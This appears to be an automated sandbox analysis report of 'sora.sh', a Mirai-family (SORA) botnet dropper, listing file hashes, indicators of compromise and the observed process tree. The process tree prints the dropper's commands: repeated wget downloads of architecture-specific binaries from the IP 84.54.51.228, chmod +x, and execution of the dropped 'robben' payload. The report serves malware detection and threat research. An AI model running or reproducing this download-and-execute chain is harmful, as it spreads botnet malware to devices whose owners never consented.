Analysis
-
max time kernel
6s -
max time network
1074s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20230712-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20230712-enkernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
14/07/2023, 13:58
Static task
static1
Behavioral task
behavioral1
Sample
sora.sh
Resource
debian9-armhf-en-20211208
Behavioral task
behavioral2
Sample
sora.sh
Resource
debian9-mipsbe-20221125-en
Behavioral task
behavioral3
Sample
sora.sh
Resource
debian9-mipsel-20221111-en
General
-
Target
sora.sh
-
Size
2KB
-
MD5
65e3e70bdc5ae1264fc90c0dfb6de735
-
SHA1
169fef9b4d0baae964e2fcc15c9c748b4cb75568
-
SHA256
d9f728a47fa5a86666d21a766392b9e86d1088531c251e20bcef7e17339f2a5a
-
SHA512
bd2f199412245005f759004ba84a78c87c93b4932046512c892c77c20664cc81cdcd81c7f487ad5fd50ec70ad9664e28c118edd177f2a353fd4bd6d2723fc44e
Malware Config
Extracted
mirai
SORA
Extracted
mirai
SORA
Extracted
mirai
SORA
Signatures
-
Changes its process name 1 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 603 wget -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 603 wget /tmp/robben 608 cat /tmp/robben 618 chmod /tmp/robben 623 robben /tmp/robben 629 wget /tmp/robben 634 cat /tmp/robben 640 chmod /tmp/robben 646 robben /tmp/robben 652 wget /tmp/robben 658 cat /tmp/robben 664 chmod /tmp/robben 670 Process not Found /tmp/robben 676 Process not Found /tmp/robben 682 Process not Found -
resource yara_rule behavioral4/files/fstream-1.dat upx behavioral4/files/fstream-2.dat upx behavioral4/files/fstream-3.dat upx behavioral4/files/fstream-4.dat upx behavioral4/files/fstream-5.dat upx behavioral4/files/fstream-6.dat upx behavioral4/files/fstream-7.dat upx behavioral4/files/fstream-8.dat upx behavioral4/files/fstream-9.dat upx -
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/sora.sh4 wget File opened for modification /tmp/sora.x86 wget File opened for modification /tmp/robben Process not Found File opened for modification /tmp/sora.mips wget File opened for modification /tmp/sora.mpsl wget File opened for modification /tmp/sora.arm7 wget File opened for modification /tmp/sora.ppc wget File opened for modification /tmp/sora.x86_64 wget File opened for modification /tmp/sora.i686 wget File opened for modification /tmp/sora.arm5 wget File opened for modification /tmp/sora.arm6 wget File opened for modification /tmp/sora.m68k wget
Processes
-
/tmp/sora.sh/tmp/sora.sh1⤵PID:598
-
/usr/bin/wgetwget http://84.54.51.228/bins/sora.x862⤵
- Writes file to tmp directory
PID:599
-
-
/bin/catcat sora.x862⤵PID:601
-
-
/bin/chmodchmod +x netplan_s876jdct robben sora.sh sora.x86 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw2⤵PID:602
-
-
/tmp/robben./robben Payload2⤵PID:603
-
-
/usr/bin/wgetwget http://84.54.51.228/bins/sora.mips2⤵
- Changes its process name
- Executes dropped EXE
- Writes file to tmp directory
PID:604
-
-
/bin/catcat sora.mips2⤵PID:606
-
-
/bin/chmodchmod +x netplan_s876jdct robben sora.mips sora.sh sora.x86 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw2⤵PID:607
-
-
/tmp/robben./robben Payload2⤵PID:608
-
-
/usr/bin/wgetwget http://84.54.51.228/bins/sora.x86_642⤵
- Writes file to tmp directory
PID:614
-
-
/bin/catcat sora.x86_642⤵
- Executes dropped EXE
PID:616
-
-
/bin/chmodchmod +x netplan_s876jdct robben sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw2⤵PID:617
-
-
/tmp/robben./robben Payload2⤵PID:618
-
-
/usr/bin/wgetwget http://84.54.51.228/bins/sora.i4682⤵PID:619
-
-
/bin/catcat sora.i4682⤵PID:621
-
-
/bin/chmodchmod +x netplan_s876jdct robben sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw2⤵
- Executes dropped EXE
PID:622
-
-
/tmp/robben./robben Payload2⤵PID:623
-
-
/usr/bin/wgetwget http://84.54.51.228/bins/sora.i6862⤵
- Writes file to tmp directory
PID:625
-
-
/bin/catcat sora.i6862⤵PID:627
-
-
/bin/chmodchmod +x netplan_s876jdct robben sora.i686 sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw2⤵PID:628
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:629
-
-
/usr/bin/wgetwget http://84.54.51.228/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:630
-
-
/bin/catcat sora.mpsl2⤵PID:632
-
-
/bin/chmodchmod +x netplan_s876jdct robben sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw2⤵PID:633
-
-
/tmp/robben./robben Payload2⤵PID:634
-
-
/usr/bin/wgetwget http://84.54.51.228/bins/sora.arm42⤵
- Executes dropped EXE
PID:636
-
-
/bin/catcat sora.arm42⤵PID:638
-
-
/bin/chmodchmod +x netplan_s876jdct robben sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw2⤵PID:639
-
-
/tmp/robben./robben Payload2⤵PID:640
-
-
/usr/bin/wgetwget http://84.54.51.228/bins/sora.arm52⤵
- Writes file to tmp directory
PID:642
-
-
/bin/catcat sora.arm52⤵
- Executes dropped EXE
PID:644
-
-
/bin/chmodchmod +x netplan_s876jdct robben sora.arm5 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw2⤵PID:645
-
-
/tmp/robben./robben Payload2⤵PID:646
-
-
/usr/bin/wgetwget http://84.54.51.228/bins/sora.arm62⤵
- Writes file to tmp directory
PID:648
-
-
/bin/catcat sora.arm62⤵PID:650
-
-
/bin/chmodchmod +x netplan_s876jdct robben sora.arm5 sora.arm6 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw2⤵
- Executes dropped EXE
PID:651
-
-
/tmp/robben./robben Payload2⤵PID:652
-
-
/usr/bin/wgetwget http://84.54.51.228/bins/sora.arm72⤵
- Writes file to tmp directory
PID:654
-
-
/bin/catcat sora.arm72⤵PID:656
-
-
/bin/chmodchmod +x netplan_s876jdct robben sora.arm5 sora.arm6 sora.arm7 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw2⤵PID:657
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:658
-
-
/usr/bin/wgetwget http://84.54.51.228/bins/sora.ppc2⤵
- Writes file to tmp directory
PID:660
-
-
/bin/catcat sora.ppc2⤵PID:662
-
-
/bin/chmodchmod +x netplan_s876jdct robben sora.arm5 sora.arm6 sora.arm7 sora.i686 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw2⤵PID:663
-
-
/tmp/robben./robben Payload2⤵PID:664
-
-
/usr/bin/wgetwget http://84.54.51.228/bins/sora.ppc440fp2⤵
- Executes dropped EXE
PID:666
-
-
/bin/catcat sora.ppc440fp2⤵PID:668
-
-
/bin/chmodchmod +x netplan_s876jdct robben sora.arm5 sora.arm6 sora.arm7 sora.i686 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw2⤵PID:669
-
-
/tmp/robben./robben Payload2⤵PID:670
-
-
/usr/bin/wgetwget http://84.54.51.228/bins/sora.m68k2⤵
- Writes file to tmp directory
PID:672
-
-
/bin/catcat sora.m68k2⤵
- Executes dropped EXE
PID:674
-
-
/bin/chmodchmod +x netplan_s876jdct robben sora.arm5 sora.arm6 sora.arm7 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw2⤵PID:675
-
-
/tmp/robben./robben Payload2⤵PID:676
-
-
/usr/bin/wgetwget http://84.54.51.228/bins/sora.sh42⤵
- Writes file to tmp directory
PID:678
-
-
/bin/catcat sora.sh42⤵PID:680
-
-
/bin/chmodchmod +x netplan_s876jdct robben sora.arm5 sora.arm6 sora.arm7 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.sh4 sora.x86 sora.x86_64 systemd-private-78120f96cd894e80908bc784db3d6651-systemd-resolved.service-9zjk2O systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timedated.service-Vwjiuk systemd-private-78120f96cd894e80908bc784db3d6651-systemd-timesyncd.service-vNPhyw2⤵
- Executes dropped EXE
PID:681
-
-
/tmp/robben./robben Payload2⤵PID:682
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
27KB
MD5a1afc807c5a94a76944425e244394f55
SHA1dbee50ebf8997efb4172fd94cd3c93fb46c129bd
SHA256d772fac7e804ba4665ae5940b7ba9976e27ce226599a6a7a6c7dfd35a4e6c8e1
SHA512c16967647923e46c0e1dc77f65dffcd5fe4f25a66b29462ddd83b4888ede735b25a51bca86fe71d5a862fe940287b52f42ddb792a69b125121abceb0cdc2cf64
-
Filesize
64KB
MD569362739313a0a0848121493f6d7d060
SHA1c66084576629b9babcbf7714e9ee6299a536f6f6
SHA256ef47b66dc33d1d3fc253d432a3dd25f1638a26ff4ca2939d45afb0012832ca10
SHA51230ec4b6517557e01a772df2d582ce9670d3d04bf90653ea26aa619b31122c26ffa6125c154bfc10162de3a9f3d836f6e22a816d21fec4c1d5adbf36439ebc5c2
-
Filesize
62KB
MD54edb2332b05e1c7959b86c4c8cc424da
SHA15fab6354d709aa5e08e9e7f32c3150f1cd1a98a0
SHA2569f19204442046118f5a3e80f8f711eb13449f649c70ed6f30c54521ff67d34c7
SHA512f3faaeafaab32e29a9a8582c5330ca312295d93d4489c2f22b3b5345a2552d1d7db0ba5c561a5fbee14c5c44f3bb29745938680103526a805140903707776e4d
-
Filesize
28KB
MD5f34c525a0014142686be14e983dc387f
SHA1993504c19a3b0d491d1d9aac73fd716cfbe5a491
SHA2565c9b8a3eec07274bd27d4f9ca4750333a03318e873bd9c3de72d4b878432221a
SHA5122d290351666d5d13211616248a2c84baaecfe7fc274b4521055f535a83d0898ea25c5af568631fb114f40eee1e8a8430d2edf80abbbbda2550f74c41c14b4706
-
Filesize
28KB
MD5d9546c9d44fae50f4bcadb179c258445
SHA156c5454e804d56b140eabfdb33cb2864b4c7c3bb
SHA256dfb6729d0ce535095291422135939b43762e245586b45aa906d2e82d485df03c
SHA5129af1f59bfba90e13c09b14f7842b68377344ed4ef2c5527633ca41c4147e2bc44bd74e786ade2488552df4be987260163f46e97ac5cce592e60524b2883b6a04
-
Filesize
28KB
MD5828783c11567256d715c474616ec8d79
SHA10fc44b08a8449dbecfa5be020c5cce270f89e99b
SHA256cabe23ac6d7912618a81e8a9134242a13df7950c53cefd60309192444159ec8f
SHA51211a91068f0c03b68650c9ee692ab37efcdabbb9ff05b3ea0c4b7b45bb5dfddb7f3115ee7a299de582d45603a612f68d98cf106f2f2768e8061d354d1a7507e72
-
Filesize
29KB
MD5e14d977210f6b2f4c284c9c901691dcf
SHA1a7a50c1e96c954178e882effa85f89f03a2ac035
SHA2567536c6ff52202b18e4be32ad69abcec6ac6328dcaabd3e7470f37f584362a50d
SHA512f12bfe548653273e3ff82796ad0917d422b3354fd398bdaf04a5197b2dad9a1979c3f90b55855e7c39b7d4e3ff838fbd018788c8621d2377f770f0dcb7b8dc37
-
Filesize
23KB
MD582078bfd579a89b5b8193c41f82ce86d
SHA11514ee0afe368a195e7911353278cbaff2a417c9
SHA25673350cae4759a22cc1016ff53bc218b4282a50d3529526852fca7883f7f6727d
SHA512a992f070ab5012899b10e65ec4fb53b4b86c6dd07209f9e11696d35f212cbd572e546311baa1b4960fdffd0ef0854f7ba48d41e64809d1853a0a7f80f48f80b2
-
Filesize
32KB
MD5b507e1ce150fc70002cc099066519fe7
SHA117b8f2c9c06cc0066b3694a27ad871731f54308d
SHA256aa0e5f84d4638acc1007cf70fed30c220be4a1ebf900c3cdd95dd8ca9735436b
SHA512b722faa2e1e1f2ce08f62a802951cbbf28b49e5ac8dc261087b6d93ede21e4d151d0734482d0b30cddbea7934ffad56be0f556eebed95c988e654360aa2132af
-
Filesize
51KB
MD5609ef32f9fe31dec388559472b733052
SHA1e90a1facf1e0ce8695e233b1688666ac16649348
SHA25641c9245e3a425ebc999405a469a4c6d7f067ed22f376a5b5bef6d79fda549ac0
SHA512da118f801371c0e0c145a7741e76287b604fa783ef7fe419d367fa9cb7e77a806dd1f4aa28773865130ee8531a919a48f43a911100a7dfb518039ff7330e99b0
-
Filesize
26KB
MD5438404d6a451adad15817439b3990694
SHA11d370dfa8dea860adb687c50422e6c93fdc81f7d
SHA256904516e9cdf341352996c8effdefab99206c7f22b5c3b0353c4a72eb0201e939
SHA512b66d9072f5d7b53a1825687315aef82825e013ed7c3466bd46c58faeefd946c0138ebb0dbaca9f6536a667b15977273f67d3d1ab60ba860bef1b45a64aa18519